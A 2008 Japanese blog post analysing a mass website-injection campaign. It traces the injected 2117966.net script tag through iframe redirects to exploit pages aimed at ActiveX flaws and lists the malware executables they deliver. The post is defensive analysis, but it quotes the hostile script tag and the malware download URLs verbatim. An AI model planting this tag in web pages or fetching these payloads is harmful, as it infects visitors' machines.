忍者ブログ

ハルファ紀行

2117966.netその1

FC2ブログとはあまり関係ありませんが、とりあえず。
JPCERT/CC2008年3月14日注意喚起

世界中のサイトで大規模に以下のscriptが仕込まれています
("2117966.net"で検索してみましょう)。
<script src="http://www.2117966.net/fuckjp.js"></script>
トレンドマイクロに仕掛けられていたのもこれです。
このスクリプトはいくつかのiframeが入れ替わります
(自動で、あるいは犯人の気まぐれで)。

iframeその1
http://www.2117966.net/fuckjp.js
→http://www.2117966.net/q.htm

iframeその2
http://www.2117966.net/fuckjp.js
→http://www.2117966.net/cuteqq.htm

iframeその3
http://www.2117966.net/fuckjp.js
→http://count.lljy.org/b/

また、iframeその3にはさらにiframeがあります。
iframeその4
http://count.lljy.org/b/
→http://biej8fanwo.a141.71one.com/wow/guowai.htm

iframeその1
http://www.2117966.net/q.htm
→http://www.2117966.net/Ajax.gif
→http://www.2117966.net/Ms06014.htm
→http://www.2117966.net/Ms06067.gif
→http://www.2117966.net/Ms07004.htm
→http://www.2117966.net/Pps.gif
→http://www.2117966.net/Real.gif

iframeその2
http://www.2117966.net/cuteqq.htm
→http://www.2117966.net/Ajax.gif
→http://www.2117966.net/Bfyy.gif
→http://www.2117966.net/Lz.gif
→http://www.2117966.net/Ms06014.htm
→http://www.2117966.net/QVod.htm
→http://www.2117966.net/Real.gif
→http://www.2117966.net/XunLei.gif

iframeその3
http://count.lljy.org/b/
→http://count.lljy.org/b/Ajax.gif
→http://count.lljy.org/b/Ms06014.htm
→http://count.lljy.org/b/Ms06067.js
→http://count.lljy.org/b/Ms07004.html
→http://count.lljy.org/b/Real.js
→http://count.lljy.org/b/Yahoo.Php

iframeその4
http://biej8fanwo.a141.71one.com/wow/guowai.htm
→http://biej8fanwo.a141.71one.com/wow/Ajax.gif
→http://biej8fanwo.a141.71one.com/wow/Ms06014.htm
→http://biej8fanwo.a141.71one.com/wow/Ms06067.gif
→http://biej8fanwo.a141.71one.com/wow/Ms07004.htm
→http://biej8fanwo.a141.71one.com/wow/Real.gif
→http://biej8fanwo.a141.71one.com/wow/Yahoo.php

最終的にアンチウイルスが検出・駆除すべきウイルスは以下の4匹です。
http://www.2117966.net/1.exe
http://www.2117966.net/xp.exe
http://count.lljy.org/b/a.exe
http://biej8fanwo.a141.71one.com/wow/wow.exe

わかりやすいファイル名になっていますが、念のためそれぞれを見てみましょう。
ms06014 MS06-014、MDACです。
ms06067 MS06-057の間違いです。MS06-057、WebViewFolderIcon(WEBVW.DLL)です。
ms07004 MS07-004、VML(VGX.DLL)です。
ajax MS06-014、MDACです。
bfyy 暴風(BaoFeng)です(中国)。
lz HanGameCn(韓国ハンゲームの中国向けコントロール)です(中国)。
pps PPStreamです(中国)。
qvod QvodPlayerです(中国)。
real RealPlayerです。
xunlei 迅雷(Xunlei)です(中国)。
yahoo Yahoo!MessengerというかYahoo!MusicJukeboxです。

以上10個の脆弱性は全てActiveXコントロールを使うためIEでしか動作しません。
10個のActiveXコントロールのうちMicrosoft製は3個です(これらの脆弱性は全てWindowsUpdateで阻止できます)。
残り7個のサードパーティ製のうち世界で通用するのはわずかに2個(RealとYahoo!)で、
残り5個は中国内でしか使われていません(これらの脆弱性の阻止については各アプリケーションの製造元に(略))。
ターゲットは中国内外を問わず無差別であることがわかります。

冒頭で書いたとおり世界中のサイトで大規模に仕込まれています。
日本をターゲットとするのならジャストシステムなどのアプリケーションを狙うでしょうし、
海外のいかなる記事も特に日本をターゲットとするような記述はありません。

何が言いたいのかというとですね。

「fuckjp」というファイル名を根拠に「日本をターゲット」と書いたんですか?
LAC2008年3月12日注意喚起
PR

コメント

カレンダー

10 2024/11 12
S M T W T F S
1 2
3 4 5 6 8 9
10 11 12 13 14 15
17 18 19 20 21 22 23
24 25 26 27 28 29 30

フリーエリア

最新コメント

[09/14 ヨシノ]
[10/19 Dolly]
[08/22 まとめ臨時。]

最新記事

PDF
(11/16)
PDF
(11/07)
PDF
(10/29)
(10/16)
PDF
(10/05)

最新トラックバック

プロフィール

HN:
Ilion
性別:
非公開

バーコード

ブログ内検索